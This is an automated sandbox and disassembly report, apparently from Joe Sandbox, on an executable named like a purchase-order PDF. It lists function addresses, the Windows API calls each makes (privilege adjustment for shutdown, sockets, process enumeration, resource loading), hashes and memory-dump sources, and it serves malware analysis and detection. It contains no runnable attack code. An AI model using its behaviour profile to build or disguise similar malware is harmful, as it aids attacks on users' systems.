                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3490752873-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                                                                                                                                                                                                            Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0047AB7C
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0047ACCD
                                                                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                            • API String ID: 1588287285-2785691316
                                                                                                                                                                                                                                                                                                            • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                                                                                                                                                                                            • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                                                                                                                                                                                                            Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00436504
                                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                                                                                                                                                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                                                                                                                                                                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                            • API String ID: 2938487562-3733053543
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                                                                                                                                                            • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                                                                                                                                                                                                            Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00436162
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00436176
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436185
                                                                                                                                                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                                                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2406429042-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                                                                                                                                                            • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                                                                                                                                                                                                            Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                                                                                            • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                                                                                                                                                                                                            • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                                                                                                                                                                                                                            Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0047AE18
                                                                                                                                                                                                                                                                                                            • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                                                                                                                                                                                                                            • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 1915432386-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                                                                                                                                                                                                            Function 0044ED9A Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 448COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: DEFINE$`$h$h
                                                                                                                                                                                                                                                                                                            • API String ID: 0-4194577831
                                                                                                                                                                                                                                                                                                            • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                                                                                                                                                                                            • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                                                                                                                                                                                                                            Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 004648DA
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 0046492D
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2609815416-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                                                                                                                                                            • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                                                                                                                                                                                                            Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 004370BA
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2547909840-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                                                                                                                                                            • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                                                                                                                                                                                                            Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
